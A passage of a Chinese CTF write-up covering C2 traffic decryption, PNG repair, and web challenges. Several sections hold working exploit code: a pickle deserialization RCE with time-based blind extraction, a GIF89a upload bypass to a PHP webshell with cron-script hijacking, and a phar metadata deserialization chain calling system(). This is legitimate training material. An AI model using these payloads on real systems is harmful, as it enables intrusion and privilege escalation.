\u4f20\u4e86 server.py\uff0c\u89e3 base64 \u540e\u662f\u5b8c\u6574\u7684 Python \u6e90\u7801\uff0c\u903b\u8f91\u662f\uff1a\n\n\u8bfb\u53d6 s3creT.txt \u7684\u5185\u5bb9\u505a MD5 \u2192 \u4f5c\u4e3a RC4 \u5bc6\u94a5\n\u76d1\u542c 192.168.31.42:9999\n\u6536\u5230\u6570\u636e\u5148 t1 \u89e3 XOR\uff08key \u57fa\u4e8e\u5f53\u524d\u5206\u949f\u65f6\u95f4\u6233\uff09\uff0c\u518d RC4 \u89e3\u5bc6\uff0c\u6309 JSON {\"opcode\":\"shell\",\"msg\":\"\u547d\u4ee4\"} \u6267\u884c<\/code><\/pre>\n\n\n\n
856 Webshell \u6267\u884c\u4e86 python server.py<\/code>\uff0c\u540e\u95e8\u8dd1\u8d77\u6765\u4e86\u3002<\/p>\n\n\n\n
\u4ece 945 \u5f00\u59cb\u51fa\u73b0 TCP 9999 \u7aef\u53e3\u7684\u975e HTTP \u52a0\u5bc6\u6d41\u91cf\uff0c\u5c31\u662f C2 \u901a\u4fe1\u3002\n\u89e3\u5bc6\uff1a\nMD5(\"R@ns0mwar3_V1ru5\") = ef578a404d5516ce43ea5da4e00a1601\n\u53d6\u6570\u636e\u5305\u65f6\u95f4\u6233 floor \u5230\u5206\u949f\uff0c\u6784\u9020 4 \u5b57\u8282 XOR key\n\u5148 t1 XOR\uff0c\u518d RC4 \u89e3\u5bc6<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u6d41\u7a0b\u5c31\u662f<\/p>\n\n\n\n
945 \uff08\u653b\u65b9\u53d1\uff09\uff1a{\"opcode\": \"shell\", \"msg\": \"dir\"}\n946 \uff08\u670d\u52a1\u5668\u56de\uff09\uff1a\u76ee\u5f55\u5217\u8868\n964 \uff1a{\"opcode\": \"shell\", \"msg\": \"type flag.txt\"}\n965 \uff1aNoneResult\uff08\u6ca1\u627e\u5230\uff09\n1036 \uff1a{\"opcode\": \"shell\", \"msg\": \"type C:\\Software\\Phpstudy_pro\\WWW\\ctf\\flag.txt\"}\n1037 \uff08\u670d\u52a1\u5668\u56de\uff09\uff1aflag<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u52a0\u5bc6\u4e86\u89e3\u5bc6\u5c31\u884c<\/p>\n\n\n\n
exp.py<\/p>\n\n\n\n
import hashlib\nimport base64\nimport re\nfrom Crypto.Cipher import ARC4\nfrom scapy.all import rdpcap, TCP, IP\n\nPCAP_FILE = \"lesuo.pcapng\"\nKEY_RAW = \"R@ns0mwar3_V1ru5\"\nC2_PORT = 9999\n\nrc4_key = hashlib.md5(KEY_RAW.encode()).hexdigest()\n\ndef t1_xor(data_str, ts):\n    ts_min = (int(ts) \/\/ 60) * 60\n    k = [int(x, 16) for x in re.findall(r'.{2}', hex(ts_min)[2:].zfill(8))]\n    return ''.join(chr(ord(c) ^ k[i % 4]) for i, c in enumerate(data_str))\n\ndef decrypt(raw, ts):\n    try:\n        s = raw.decode('utf-8', errors='replace')\n        s = t1_xor(s, ts)\n        data = base64.b64decode(s)\n        return ARC4.new(rc4_key.encode()).decrypt(data).decode('utf-8', errors='replace')\n    except:\n        return None\n\npackets = rdpcap(PCAP_FILE)\n\nfor i, pkt in enumerate(packets):\n    if not (pkt.haslayer(TCP) and pkt.haslayer(IP)):\n        continue\n    tcp = pkt[TCP]\n    if C2_PORT not in (tcp.sport, tcp.dport):\n        continue\n    payload = bytes(tcp.payload)\n    if not payload:\n        continue\n    result = decrypt(payload, float(pkt.time))\n    if result:\n        direction = \"->\" if tcp.dport == C2_PORT else \"<-\"\n        print(f\"[{i+1}] {direction} {result.strip()[:300]}\")<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
flag{3741b40e-3185-4a9a-80a6-83403e4942fc}<\/code><\/pre>\n\n\n\n
\u9493\u9c7c\u8f7d\u8377\u4e0e C2 \u8ffd\u8e2a\u3010\u7b80\u5355\u3011<\/h2>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u770b\u5305\u53ef\u4ee5\u53d1\u73b0\u7b2c\u4e00\u4e2abase64\u7f16\u7801\u7684flag<\/p>\n\n\n\n
\u7b2c\u4e00\u6bb5<\/h3>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
ZmxhZ3todzIwMjZf<\/code><\/pre>\n\n\n\n
\u7b2c\u4e8c\u6bb5\u548c\u7b2c\u4e09\u6bb5<\/h3>\n\n\n\n
ip.addr == 185.244.25.108 and ip.addr == 10.11.19.101<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u53ef\u4ee5\u770b\u5230\u7b2c\u4e8c\u6bb5\u548c\u7b2c\u4e09\u6bb5<\/p>\n\n\n\n
\u62fc\u63a5\u5c31\u884c<\/p>\n\n\n\n
ZmxhZ3todzIwMjZfODlhN19mZDNjXw==\nNzhiOX0=<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
flag{hw2026_89a7_fd3c_78b9}<\/code><\/pre>\n\n\n\n
\u5b8f\u75c5\u6bd2\u4e0e C2 \u901a\u4fe1\u3010\u4e2d\u7b49\u3011<\/h2>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u8fd8\u662f3\u6bb5flag<\/p>\n\n\n\n
DNS \u51fa\u73b0\u53ef\u7591\u5341\u516d\u8fdb\u5236\u5b50\u57df\u540d\u3002\n\u5047 CDN \u57df\u540d update.microsoft-cdn-services.com\u4e0b\u53d1\u5185\u5bb9\u3002\n\u540e\u7eed SSLoad \/ C2 \u6301\u7eed\u901a\u4fe1\u3002<\/code><\/pre>\n\n\n\n
flag1<\/h3>\n\n\n\n
\u770bDNS \u7b2c\u56db\u4e2a\u5305\u53ef\u4ee5\u53d1\u73b0<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
flag{M3m0ry_<\/code><\/pre>\n\n\n\n
flag2<\/h3>\n\n\n\n
37\u5305\u53ef\u4ee5\u53d1\u73b0flag2<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
R34d_By_P4ss_<\/code><\/pre>\n\n\n\n
flag3<\/h3>\n\n\n\n
\u7b2c\u4e94\u4e2a\u5305 token\u540e\u9762\u5c31\u662f<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
MHg3RjJBfQ==<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u62fc\u63a5<\/p>\n\n\n\n
flag{M3m0ry_R34d_By_P4ss_0x7F2A}<\/code><\/pre>\n\n\n\n
\u4ec0\u4e48\u662f\u5feb\u4e50\u661f\u7403<\/h2>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u5148\u53cd\u8272 \u5f97\u5230\u7b2c\u4e00\u6bb5flag<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
flag{3a885a8b447<\/code><\/pre>\n\n\n\n
\u53e6\u4e00\u4e2a\u662fIDAT \u9690\u5199<\/p>\n\n\n\n
\u770b chunk<\/p>\n\n\n\n
PNG \u7684 chunk \u7ed3\u6784\u5f88\u56fa\u5b9a\uff1a<\/p>\n\n\n\n
[length(4)][type(4)][data(length)][crc(4)]<\/code><\/pre>\n\n\n\n
1.py<\/p>\n\n\n\n
import struct\n\nwith open(\"flag.png\", \"rb\") as f:\n    data = f.read()\n\no = 8\nidx = 0\nwhile o < len(data):\n    length = struct.unpack(\">I\", data[o:o + 4])[0]\n    ctype = data[o + 4:o + 8]\n    print(idx, hex(o), ctype.decode(\"latin1\"), length)\n    o2 = o + 12 + length\n    if o2 > len(data):\n        print(\"chunk \u8d8a\u754c\u4e86\")\n        break\n    o = o2\n    idx += 1<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u524d\u9762\u51e0\u4e2a IDAT \u90fd\u6b63\u5e38\n\u5230\u540e\u9762\u4ee5\u540e\uff0c\u957f\u5ea6\u5b57\u6bb5\u5f00\u59cb\u53d8\u5f97\u79bb\u8c31\n\u751a\u81f3\u80fd\u770b\u51fa\u50cf 8HR3\u8fd9\u79cd\u53ef\u6253\u5370\u5b57\u7b26<\/code><\/pre>\n\n\n\n
\u628a\u6240\u6709 IDAT \u627e\u51fa\u6765<\/p>\n\n\n\n
with open(\"flag.png\", \"rb\") as f:\n    data = f.read()\n\ni = 0\nwhile True:\n    j = data.find(b\"IDAT\", i)\n    if j == -1:\n        break\n    print(hex(j - 4), data[j - 4:j], data[j:j + 4])\n    i = j + 4<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u524d 5 \u4e2a\u662f\u6b63\u5e38 chunk\uff0c\u540e 5 \u4e2a\u867d\u7136\u957f\u5ea6\u5b57\u6bb5\u574f\u4e86\uff0c\u4f46 `IDAT` \u6807\u8bb0\u8fd8\u5728\uff0c\u6240\u4ee5\u8bf4\u660e\u6570\u636e\u672c\u4f53\u5e76\u6ca1\u6709\u4e22\uff0c\u53ea\u662f PNG \u89e3\u6790\u5668\u6ca1\u6cd5\u6309\u6b63\u5e38 chunk \u53bb\u8bfb\u5b83\u3002<\/code><\/pre>\n\n\n\n
\u524d\u51e0\u4e2a\u6b63\u5e38 IDAT<\/code> \u7684\u957f\u5ea6\u90fd\u4e00\u6837\uff0c\u90fd\u662f 115795<\/code>\u3002\u518d\u770b\u5b83\u4eec\u4e4b\u95f4\u7684\u95f4\u9694\uff0c\u4e5f\u662f\u56fa\u5b9a\u7684\uff1a<\/p>\n\n\n\n
0x1c45f<\/code><\/pre>\n\n\n\n
\u8fd9\u4e2a\u503c\u6b63\u597d\u5c31\u662f\uff1a<\/p>\n\n\n\n
4(length) + 4(type) + 115795(data) + 4(crc)\n= 115807\n= 0x1c45f<\/code><\/pre>\n\n\n\n
\u4e5f\u5c31\u662f\u8bf4\uff0c\u8fd9\u9898\u540e\u9762\u90a3\u4e9b\u574f\u6389\u7684 IDAT<\/code>\uff0c\u5927\u6982\u7387\u4e0d\u662f\u538b\u7f29\u6570\u636e\u574f\u4e86\uff0c\u800c\u662f chunk \u5934\u91cc\u7684\u957f\u5ea6\u88ab\u6539\u70c2\u4e86\u3002\u6240\u4ee5\u601d\u8def\u5c31\u5f88\u76f4\u63a5\uff1a\u524d\u9762\u90a3\u4e9b\u574f\u6389\u7684 IDAT<\/code>\uff0c\u957f\u5ea6\u76f4\u63a5\u6539\u56de 115795<\/code>\u6700\u540e\u4e00\u4e2a IDAT<\/code> \u56e0\u4e3a\u540e\u9762\u9a6c\u4e0a\u63a5 IEND<\/code>\uff0c\u5355\u72ec\u6309\u6587\u4ef6\u5c3e\u53cd\u63a8\u6700\u540e\u4e00\u4e2a\u957f\u5ea6\u7684\u8ba1\u7b97\u65b9\u5f0f\uff1a<\/p>\n\n\n\n
last_len = filesize - last_idat_offset - 24<\/code><\/pre>\n\n\n\n
\u8fd9\u91cc\u7684 24 \u662f\uff1a<\/p>\n\n\n\n
\u5f53\u524d\u5757\u7684 length + type\uff1a8 \u5b57\u8282\n\u5f53\u524d\u5757\u7684 crc\uff1a4 \u5b57\u8282\n\u7ed3\u5c3e IEND\uff1a12 \u5b57\u8282<\/code><\/pre>\n\n\n\n
exp.py<\/p>\n\n\n\n
from pathlib import Path\nimport struct\n\nPNG_MAGIC = b\"x89PNGrnx1an\"\nNORMAL_IDAT_LEN = 115795\n\ndef list_chunks(data: bytes):\n    if not data.startswith(PNG_MAGIC):\n        raise ValueError(\"not a png file\")\n\n    offset = 8\n    chunks = []\n    while offset + 8 <= len(data):\n        length = struct.unpack(\">I\", data[offset:offset + 4])[0]\n        chunk_type = data[offset + 4:offset + 8]\n        next_offset = offset + 12 + length\n        chunks.append((offset, chunk_type, length, next_offset))\n        if next_offset > len(data):\n            break\n        offset = next_offset\n    return chunks\n\ndef find_idat_positions(data: bytes):\n    positions = []\n    cursor = 0\n    while True:\n        pos = data.find(b\"IDAT\", cursor)\n        if pos == -1:\n            break\n        positions.append(pos - 4)\n        cursor = pos + 4\n    return positions\n\ndef repair_png(src: str = \"flag.png\", dst: str = \"fixed.png\"):\n    data = bytearray(Path(src).read_bytes())\n\n    print(\"[*] checking original chunk layout\")\n    for idx, (offset, chunk_type, length, next_offset) in enumerate(list_chunks(data)):\n        name = chunk_type.decode(\"latin1\")\n        print(f\"{idx:02d} {offset:#x} {name} {length}\")\n        if next_offset > len(data):\n            print(\"[!] chunk length overflow detected\")\n            break\n\n    idat_positions = find_idat_positions(data)\n    print(f\"[*] found {len(idat_positions)} IDAT markers\")\n    for pos in idat_positions:\n        print(f\"    {pos:#x} len_field={data[pos:pos + 4]!r}\")\n\n    for pos in idat_positions[:-1]:\n        data[pos:pos + 4] = struct.pack(\">I\", NORMAL_IDAT_LEN)\n\n    last_pos = idat_positions[-1]\n    last_len = len(data) - last_pos - 24\n    data[last_pos:last_pos + 4] = struct.pack(\">I\", last_len)\n\n    Path(dst).write_bytes(data)\n\n    print(f\"[*] wrote repaired png to {dst}\")\n    print(f\"[*] last IDAT length = {last_len}\")\n\nif __name__ == \"__main__\":\n    repair_png()<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
flag{3a885a8b4479db9c15ede424b93c400e}<\/code><\/pre>\n\n\n\n
Web<\/h1>\n\n\n\n
python\uff01\uff01\uff01\u53cd\u5e8f\u5217\u5316\u3010\u56f0\u96be\u3011<\/h2>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
python\u53cd\u5e8f\u5217\u5316 \u76f2\u6ce8<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u6d4b\u8bd5\u547d\u4ee4\u6267\u884c<\/p>\n\n\n\n
\u6784\u9020\u4e00\u4e2a\u7684payload\uff0c\u6267\u884csleep 5<\/code>\u770b\u54cd\u5e94\u65f6\u95f4\uff1a<\/p>\n\n\n\n
import base64\n\npayload = \"\"\"cos\nsystem\n(S'sleep 5'\ntR.\"\"\"\n\nencoded = base64.b64encode(payload.encode()).decode()\nprint(encoded)<\/code><\/pre>\n\n\n\n
\u5f97\u5230\uff1aY29zCnN5c3RlbQooUydzbGVlcCA1Jwp0Ui4=<\/code><\/pre>\n\n\n\n
\u8bf7\u6c42\u6d4b\u8bd5<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u5b58\u5728RCE<\/p>\n\n\n\n
payload1 = 'cosnsystemn(S'sh -c \"[ -f \/flag ] && sleep 3\"'ntR.'\npayload2 = 'cosnsystemn(S'sh -c \"[ -f \/flag.txt ] && sleep 3\"'ntR.'<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u5f97\u5230<\/p>\n\n\n\n
Y29zCnN5c3RlbQooUydzaCAtYyAiWyAtZiAvZmxhZyBdICYmIHNsZWVwIDMiJwp0Ui4=\nY29zCnN5c3RlbQooUydzaCAtYyAiWyAtZiAvZmxhZy50eHQgXSAmJiBzbGVlcCAzIicKdFIu<\/code><\/pre>\n\n\n\n
\u6d4b\u8bd5 \/flag \u662f\u5426\u5b58\u5728<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u5b58\u5728<\/p>\n\n\n\n
\u540e\u9762\u6d4b\u8bd5\u9700\u8981\u7528\u65f6\u95f4\u76f2\u6ce8\u63d0\u53d6flag\u9010\u5b57\u7b26\u7206\u7834<\/p>\n\n\n\n
exp.py<\/p>\n\n\n\n
import base64\nimport string\nimport time\n\nimport requests\n\nURL = \"https:\/\/c56-t785-chal3.challenges.wdsec.com.cn\/\"\n\ndef make_payload(cmd: str) -> str:\n    raw = f\"cosnsystemn(S'{cmd}'ntR.\".encode()\n    return base64.b64encode(raw).decode()\n\ndef request_time(cmd: str) -> float:\n    data = {\n        \"action\": \"check_book\",\n        \"serialized_book\": make_payload(cmd),\n    }\n    t0 = time.time()\n    try:\n        requests.post(URL, data=data, timeout=15)\n    except:\n        pass\n    return time.time() - t0\n\ndef get_char_grep(pos: int, charset: str, threshold: float) -> str:\n    \"\"\"Use grep with regex to match character at position.\"\"\"\n    for ch in charset:\n        if ch in r'.[]{}()*+?|^<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
flag{161fa496-c722-42e1-aefc-d696dd31ea9d}\n<\/code><\/pre>\n\n\n\n
UPload_is_Funny&Easy<\/h2>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u76f4\u63a5\u8bbf\u95ee\u4ec0\u4e48\u4e5f\u6ca1\u6709<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u76f4\u63a5\u76ee\u5f55\u626b\u63cf<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u53ef\u4ee5\u53d1\u73b0\u662f\u6587\u4ef6\u4e0a\u4f20\u9898\u76ee<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u5148\u76f4\u63a5\u8bd5\u4e0a\u4f20\uff0c\u53d1\u73b0\u666e\u901a txt<\/code> \u548c php<\/code> \u90fd\u4e0d\u884c\uff0c\u62a5\u9519\u662f\u53ea\u5141\u8bb8 JPG\u3001PNG\u3001GIF<\/code>\u3002<\/p>\n\n\n\n
\u4f46\u662f\u8fd9\u91cc\u7684\u6821\u9a8c\u4e0d\u662f\u770b\u540e\u7f00\uff0c\u800c\u662f\u770b\u6587\u4ef6\u5185\u5bb9\u662f\u4e0d\u662f\u56fe\u7247\uff0c\u53ea\u6709\u6587\u4ef6\u5934\u7684\u6821\u9a8c<\/p>\n\n\n\n
\u53ea\u6709 GIF89a<\/code> \u5934\u7684\u6587\u4ef6\uff0c\u53ef\u4ee5\u6210\u529f\u4e0a\u4f20\uff0c\u53ef\u4ee5\u770b\u5230\u8fd4\u56de\u8def\u5f84<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u5728\u4e0a\u4f20\u4e00\u6b21\u6293\u5305 \u6539\u540e\u7f00\u4e3aphp<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u4e0a\u4f20\u6210\u529f<\/p>\n\n\n\n
\u8bbf\u95ee<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
https:\/\/c56-t785-chal37.challenges.wdsec.com.cn\/uploads\/69e312a88a911_1.php?x=id

<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u53ef\u4ee5\u547d\u4ee4\u6267\u884c\u4e86<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u53d1\u73b0flag\u770b\u6743\u9650\uff1a<\/p>\n\n\n\n
?x=ls -l \/flag \/fllllag.sh\n<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\/flag \u53ea\u6709 root \u80fd\u8bfb\uff0c\u5f53\u524d WebShell \u662f www-data\uff0c\u76f4\u63a5 cat \/flag \u8bfb\u4e0d\u5230\u3002\n<\/code><\/pre>\n\n\n\n
\u53bb\u770b \/fllllag.sh<\/p>\n\n\n\n
?x=cat \/fllllag.sh\n\u5185\u5bb9\n#!\/bin\/bash\nrm -rf \/var\/www\/html\/uploads\/*.php\n<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u8fd9\u4e2a\u70b9\u5c31\u5f88\u660e\u663e\u4e86\u3002<\/p>\n\n\n\n
\u8fd9\u4e2a\u811a\u672c\u6743\u9650\u662f 777<\/code>\uff0c\u8bf4\u660e\u8c01\u90fd\u80fd\u6539\u3002<\/p>\n\n\n\n
\u800c\u5b83\u660e\u663e\u4e0d\u662f\u624b\u5de5\u6267\u884c\u7528\u7684\uff0c\u66f4\u50cf\u662f root \u7684\u5b9a\u65f6\u4efb\u52a1\uff0c\u5b9a\u671f\u6e05\u7406\u4e0a\u4f20\u76ee\u5f55\u91cc\u7684 PHP \u6587\u4ef6\u3002<\/p>\n\n\n\n
\u90a3\u5c31\u4e0d\u7528\u518d\u627e\u522b\u7684\u63d0\u6743\u70b9\u4e86\uff0c\u76f4\u63a5\u52ab\u6301\u8fd9\u4e2a\u811a\u672c\u3002<\/p>\n\n\n\n
\u628a\u5b83\u6539\u6210\uff1a<\/p>\n\n\n\n
#!\/bin\/bash
cp \/flag \/var\/www\/html\/uploads\/flag.txt
chmod 644 \/var\/www\/html\/uploads\/flag.txt

<\/code><\/pre>\n\n\n\n
\u547d\u4ee4<\/p>\n\n\n\n
https://c56-t785-chal37.challenges.wdsec.com.cn\/uploads\/69e31609b208c_1.php?x=printf%20%27#!\/bin\/bash%5Cncp%20\/flag%20\/var\/www\/html\/uploads\/flag.txt%5Cnchmod%20644%20\/var\/www\/html\/uploads\/flag.txt%5Cn%27%20%3E%20\/fllllag.sh\n\n<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u6539\u5b8c\u4ee5\u540e\u7b49\u8ba1\u5212\u4efb\u52a1\u4e0b\u4e00\u6b21\u6267\u884c\u3002<\/p>\n\n\n\n
\u7136\u540e\u8bbf\u95ee\uff1a<\/p>\n\n\n\n
\/uploads\/flag.txt<\/code><\/pre>\n\n\n\n
\u5c31\u53ef\u4ee5\u89e3\u51faflag\u4e86<\/p>\n\n\n\n
flag{linux_is_very_funny}\n<\/code><\/pre>\n\n\n\n
hard\u5ba1\u8ba1PHP<\/h2>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u626b\u63cf\u76ee\u5f55\u53ef\u4ee5\u53d1\u73b0 \u6e90\u7801\u6cc4\u9732<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u4e3b\u8981\u770b<\/p>\n\n\n\n
show.php\uff0cclass.php\uff0cupload.php<\/p>\n\n\n\n
\u5ba1\u8ba1show.php<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
show.php\u4e3b\u8981\u903b\u8f91\u662f\uff1a\n\u7981\u6b62 http \u548c ftp \u5f00\u5934\n\u53ea\u5141\u8bb8\u8def\u5f84\u540e\u7f00\u662f jpg\/jpeg\/gif\/png\nfile_exists($_GET['path'])`\nfile_get_contents($_GET['path'])\n\n\u6f0f\u6d1e\u662f file_exists()\u3002\n\u5982\u679c\u4f20\u5165 phar:\/\/...\uff0c\u4f1a\u89e6\u53d1 phar metadata \u53cd\u5e8f\u5217\u5316\u3002\n\u56e0\u4e3a\u5b83\u53ea\u505a\u4e86\u201c\u540e\u7f00\u5224\u65ad\u201d\uff0c\u6240\u4ee5\u53ef\u4ee5\u6784\u9020\uff1a\nphar:\/\/.\/upload\/xxx.png\/a.jpg\n\u65e2\u6ee1\u8db3\u540e\u7f00\uff0c\u53c8\u80fd\u89e6\u53d1\u53cd\u5e8f\u5217\u5316\u3002\n<\/code><\/pre>\n\n\n\n
\u5ba1\u8ba1class.php<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
User::__destruct()\u4f1a\u904d\u5386 $this->photos\n\u5bf9\u6bcf\u4e2a $photo \u8c03\u7528 $photo->exists()\n\u5982\u679c\u5bf9\u8c61\u6ca1\u6709\u8be5\u65b9\u6cd5\uff0c\u4f1a\u8d70\u5bf9\u8c61\u7684 __call()\nLog::__call() \u91cc\u6267\u884c\uff1a\ncall_user_func($this->error, $this->arg1, $this->arg2)\n\u6240\u4ee5\u53ef\u63a7\u70b9\u5f88\u76f4\u63a5\uff1a\nerror = call_user_func\narg1 = system\narg2 = cat \/flag;cat \/flag.txt\n\n\u8fd9\u6837 __call \u89e6\u53d1\u540e\u5c31\u4f1a\u6267\u884c\u7cfb\u7edf\u547d\u4ee4\u3002\n<\/code><\/pre>\n\n\n\n
\u89e3\u9898<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u5199\u4e00\u4e2a\u5e26\u6076\u610f metadata \u7684 phar\nstub \u4f2a\u88c5\u6210\u56fe\u7247\u5934\uff0c\u6539\u540d exp.png\n\u8d70\u6b63\u5e38\u4e0a\u4f20\u63a5\u53e3 upload.php \u4e0a\u4f20\n\u4ece\u8fd4\u56de\u91cc\u63d0\u53d6\u771f\u5b9e\u6587\u4ef6\u540d .\/upload\/\u65f6\u95f4\u6233.png\n\u8bbf\u95ee\uff1a\nshow.php?path=phar:\/\/.\/upload\/\u65f6\u95f4\u6233.png\/a.jpg<\/code><\/pre>\n\n\n\n
exp.py<\/p>\n\n\n\n
import os\nimport re\nimport subprocess\nimport tempfile\nimport requests\n\nBASE = \"https:\/\/c56-t785-chal39.challenges.wdsec.com.cn\"\nCMD = \"cat \/flag;cat \/flag.txt;ls -la \/\"\n\nphp_payload = \"\"\"<?php\nclass User{private $name;private $age;private $photos;}\nclass Log{public $error;public $arg1;public $arg2;}\n$log=new Log();\n$log->error='call_user_func';\n$log->arg1='system';\n$log->arg2=$argv[1]??'cat \/flag';\n$user=new User();\n$r=new ReflectionClass('User');\n$p=$r->getProperty('photos');\n$p->setAccessible(true);\n$p->setValue($user,[$log]);\n@unlink(__DIR__.'\/exp.phar');\n@unlink(__DIR__.'\/exp.png');\n$phar=new Phar(__DIR__.'\/exp.phar');\n$phar->startBuffering();\n$phar->addFromString('a.jpg','x');\n$phar->setStub(\"GIF89a<?php __HALT_COMPILER(); ?>\");\n$phar->setMetadata($user);\n$phar->stopBuffering();\nrename(__DIR__.'\/exp.phar',__DIR__.'\/exp.png');\necho \"ok\\n\";\n\"\"\"\n\nwith tempfile.TemporaryDirectory() as d:\n    build_php = os.path.join(d, \"build.php\")\n    with open(build_php, \"w\", encoding=\"utf-8\") as f:\n        f.write(php_payload)\n\n    subprocess.run([\"php\", \"-d\", \"phar.readonly=0\", build_php, CMD], cwd=d, check=True)\n\n    exp_png = os.path.join(d, \"exp.png\")\n    with open(exp_png, \"rb\") as fp:\n        r = requests.post(\n            BASE + \"\/upload.php\",\n            data={\"title\": \"x\", \"name\": \"x\", \"age\": \"1\"},\n            files={\"photo\": (\"exp.png\", fp, \"image\/png\")},\n            timeout=20\n        )\n\n    m = re.search(r\".\/upload\/(d+.png)\", r.text)\n    if not m:\n        print(r.text)\n        raise SystemExit(\"upload filename not found\")\n\n    fname = m.group(1)\n    trigger = BASE + f\"\/show.php?path=phar:\/\/.\/upload\/{fname}\/a.jpg\"\n    rr = requests.get(trigger, timeout=20)\n    out = rr.content.decode(\"utf-8\", \"ignore\")\n    print(out)\n\n    flag = re.search(r\"flag\\{[^}]+\\}\", out)\n    if flag:\n        print(\"FLAG:\", flag.group(0))\n<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
flag{jjk81jsh10a1lo1p0}<\/code><\/pre>\n\n\n\n
AI<\/h1>\n\n\n\n
EzAI-NaiveModel\u3010\u4e2d\u7b49\u3011<\/h2>\n\n\n\n
\u770b\u9644\u4ef6<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u4e5f\u5c31\u662f\u8bf4\u6b63\u6837\u672c\u6c38\u8fdc\u662f\u540c\u4e00\u5f20\u56fe\uff0c\u8d1f\u6837\u672c\u5168\u662f\u968f\u673a\u566a\u58f0\u3002<\/p>\n\n\n\n
\u8fd9\u4e2a\u6a21\u578b\u672c\u8d28\u4e0a\u4e0d\u662f\u5728\u5b66\u5206\u7c7b\uff0c\u800c\u662f\u5728\u8bb0\u90a3\u4e00\u5f20\u56fe\u3002<\/p>\n\n\n\n
\u6a21\u578b\u7ed3\u6784\u4e5f\u5f88\u7b80\u5355\uff0c\u5c31\u662f\u4e2a\u5168\u8fde\u63a5\uff1a<\/p>\n\n\n\n
self.fc1 = torch.nn.Linear(28*28, 512)\nself.fc2 = torch.nn.Linear(512, 128)\nself.fc3 = torch.nn.Linear(128, 2)\n<\/code><\/pre>\n\n\n\n
\u6240\u4ee5\u62ff\u5230 model.pth<\/code> \u4ee5\u540e\uff0c\u76f4\u63a5\u505a\u8f93\u5165\u53cd\u6f14\u5c31\u884c\u3002\u968f\u673a\u521d\u59cb\u5316\u4e00\u5f20 28x28<\/code> \u56fe\uff0c\u4e0d\u65ad\u4f18\u5316\u5b83\uff0c\u8ba9\u6a21\u578b\u5bf9 class=1<\/code> \u7684\u8f93\u51fa\u5c3d\u91cf\u9ad8\u3002<\/p>\n\n\n\n
\u8bad\u7ec3\u65f6\u505a\u4e86\uff1a<\/p>\n\n\n\n
transforms.Normalize((0.5,), (0.5,))\n<\/code><\/pre>\n\n\n\n
\u6240\u4ee5\u53cd\u6f14\u65f6\u4e5f\u6309\u8fd9\u4e2a\u5206\u5e03\u5582\u8fdb\u53bb\u3002<\/p>\n\n\n\n
exp.py<\/p>\n\n\n\n
import torch
import cv2
from PIL import Image

class M(torch.nn.Module):
    def __init__(self):
        super().__init__()
        self.fc1 = torch.nn.Linear(784, 512)
        self.fc2 = torch.nn.Linear(512, 128)
        self.fc3 = torch.nn.Linear(128, 2)

    def forward(self, x):
        x = torch.flatten(x, 1)
        x = torch.relu(self.fc1(x))
        x = torch.relu(self.fc2(x))
        return torch.softmax(self.fc3(x), dim=-1)

model = M()
model.load_state_dict(torch.load('model.pth', map_location='cpu'))
model.eval()

z = torch.randn(1, 1, 28, 28, requires_grad=True)
opt = torch.optim.Adam([z], lr=0.1)

for _ in range(3000):
    x = torch.sigmoid(z)
    y = model((x - 0.5) \/ 0.5)[0, 1]
    loss = -y
